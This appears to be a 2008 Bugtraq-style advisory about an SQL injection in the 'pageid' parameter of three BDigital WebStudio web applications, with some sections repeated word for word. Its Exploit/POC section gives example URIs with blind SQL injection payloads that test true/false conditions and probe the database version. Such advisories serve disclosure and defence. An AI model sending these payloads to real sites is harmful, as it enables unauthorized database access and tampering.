Multiple BDigital Web Solutions Applications 'pageid' Parameter SQL Injection Vulnerability
BID:32449
Info
Multiple BDigital Web Solutions Applications 'pageid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 32449 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5293 CVE-2008-5294 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 24 2008 12:00AM |
| Updated: | Dec 02 2008 11:51PM |
| Credit: | Charalambous Glafkos |
| Vulnerable: |
BDigital Web Solutions WebStudio eHotel 0 BDigital Web Solutions WebStudio eCatalogue 0 BDigital Web Solutions WebStudio CMS 0 |
| Not Vulnerable: | |
Discussion
Multiple BDigital Web Solutions Applications 'pageid' Parameter SQL Injection Vulnerability
Multiple BDigital Web Solutions applications are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following applications are vulnerable:
WebStudio CMS
WebStudio eHotel
WebStudio eCatalogue
Multiple BDigital Web Solutions applications are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following applications are vulnerable:
WebStudio CMS
WebStudio eHotel
WebStudio eCatalogue
Exploit / POC
Multiple BDigital Web Solutions Applications 'pageid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
For WebStudio CMS
http://www.example.com/index.php?pageid=1+and+1=1
http://www.example.com/index.php?pageid=1+and+1=2
http://www.example.com/index.php?pageid=1+and+substring(@@version,1,1)=3
http://www.example.com/index.php?pageid=1+and+substring(@@version,1,1)=4
http://www.example.com/index.php?pageid=1+and+substring(@@version,1,1)=5
For WebStudio eHotel and WebStudio eCatalogue
http://www.example.com/index.php?pageid=50+and+substring(@@version,1,1)=3
http://www.example.com/index.php?pageid=50+and+substring(@@version,1,1)=4
http://www.example.com/index.php?pageid=50+and+substring(@@version,1,1)=5
Attackers can use a browser to exploit this issue.
The following example URIs are available:
For WebStudio CMS
http://www.example.com/index.php?pageid=1+and+1=1
http://www.example.com/index.php?pageid=1+and+1=2
http://www.example.com/index.php?pageid=1+and+substring(@@version,1,1)=3
http://www.example.com/index.php?pageid=1+and+substring(@@version,1,1)=4
http://www.example.com/index.php?pageid=1+and+substring(@@version,1,1)=5
For WebStudio eHotel and WebStudio eCatalogue
http://www.example.com/index.php?pageid=50+and+substring(@@version,1,1)=3
http://www.example.com/index.php?pageid=50+and+substring(@@version,1,1)=4
http://www.example.com/index.php?pageid=50+and+substring(@@version,1,1)=5
Solution / Fix
Multiple BDigital Web Solutions Applications 'pageid' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multiple BDigital Web Solutions Applications 'pageid' Parameter SQL Injection Vulnerability
References:
References:
- WebStudio CMS Homepage (BDigital Web Solutions)
- WebStudio eCatalogue Homepage (BDigital Web Solutions)
- WebStudio eHotel Homepage (BDigital Web Solutions)
- WebStudio CMS 'pageid' Blind SQL Injection ([email protected])